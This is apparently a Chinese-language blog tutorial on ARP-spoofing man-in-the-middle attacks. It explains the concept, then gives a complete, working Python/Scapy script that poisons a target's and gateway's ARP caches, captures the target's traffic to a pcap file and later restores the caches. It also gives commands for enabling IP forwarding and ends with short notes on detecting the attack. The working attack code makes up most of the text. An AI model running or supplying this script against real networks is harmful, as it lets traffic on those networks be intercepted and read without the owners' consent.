中间人攻击，像数据结构链表中两节点添加新节点类似，渗透人员利用arp协议，向两端攻击目标不断发起ARP响应报文，以替换目标的mac地址，使原有客户端->服务端（网关等）的请求流程，替换为客户端->中间人->服务端。成功后，渗透人员可以利用中间节点对两端流量自由处理。

一、源代码

# -*- coding: UTF-8 -*-
import os;
import sys;
import threading;
import signal;
from scapy.all import *
interface = "en0";
target_ip = "192.168.1.20";
gateway_ip = "192.168.1.1";
packet_count = 1000;

# conf.iface = interface;

# conf.verb = 0;

print ("发包端口 %s" % interface);


def get_mac(ip_address):
    # srp函数（发送和接收数据包，发送指定ARP请求到指定IP地址,然后从返回的数据中获取目标ip的mac）
    responses,unanswered = srp(Ether(dst="ff:ff:ff:ff:ff:ff")/ARP(pdst=ip_address),timeout=2,retry=10);
    for s,r in responses:
        return r[Ether].src;
    return None;

gateway_mac  = get_mac(gateway_ip);

target_mac = get_mac(target_ip);

if target_mac is None:
    print("目标IP不可达");
else:
    print("[%s]的mac地址为[%s]" %(target_ip,target_mac));
if gateway_mac is None:
    print("网关不可达");
else:
    print("[%s]的mac地址为[%s]" %(gateway_ip,gateway_mac));

#恢复
def restore_target(gateway_ip,gateway_mac,target_ip,target_mac):
    print("恢复....");
    send(ARP(op=2,psrc=gateway_ip,pdst=target_ip,hwdst="ff:ff:ff:ff:ff:ff",hwsrc=gateway_mac),count=5);
    send(ARP(op=2,psrc=target_ip,pdst=gateway_ip,hwdst="ff:ff:ff:ff:ff:ff",hwsrc=target_mac),count=5);
    os.kill(os.getpid(),signal.SIGINT);
#中间人攻击
def poison_target(gateway_ip,gateway_mac,target_ip,target_mac):
    #网关发给目标主机
    poison_target = ARP();
    poison_target.op =2;
    poison_target.psrc = gateway_ip;
    poison_target.pdst = target_ip;
    poison_target.hwdst = target_mac;

    #目标主机发给网关
    poison_gateway = ARP();
    poison_gateway.op = 2;
    poison_gateway.psrc = target_ip;
    poison_gateway.pdst = gateway_ip;
    poison_gateway.hwdst = gateway_mac

    print("开始实施攻击....");

    while True:
        try:
            send(poison_target);
            send(poison_gateway);
            time.sleep(2);
        except KeyboardInterrupt:
            restore_target(gateway_ip,gateway_mac,target_ip,target_mac);
    print("攻击结束....");
    return;

poison_thread = threading.Thread(target= poison_target,args=(gateway_ip,gateway_mac,target_ip,target_mac));
poison_thread.start();

try:
    print("启动抓包程序....");
    print("不要忘记开启 IP转发，否则目标IP无法上网。MAC：sudo sysctl -w net.inet.ip.forwarding=1 | linux: echo 1 > /proc/sys/net/ipv4/ip_forward");
    bpf_filter = "ip host %s" % target_ip;
    packets = sniff(count= packet_count,filter=bpf_filter,iface=interface); #启动抓包
    wrpcap("arpTest.pcap",packets); #写入pcap文件
except KeyboardInterrupt:
    restore_target(gateway_ip,gateway_mac,target_ip,target_mac);
    sys.exit(0);

当我们启动程序后，通过wireshark抓包，可见1.20与1.1的对应MAC地址已替换成中间人MAC地址

我们可以通过受攻击目标客户端主机 arp -a命令进行查看，网关地址的MAC已为中间人MAC。

当中间人不开启IP转发时，受攻击客户端无法进行网络通讯。

二、说点其它

       中间人攻击带来的危害还是非常大的，不过该问题非常容易发现，我们可以从地址冲突、mac地址查看、网络缓慢或中断等多个维度查看、分析便可快速定位问题点。基于ARP协议，我们还可以做很多有趣的事情，下节分享如何基于ARP生成虚假节点，形成动态防御架构。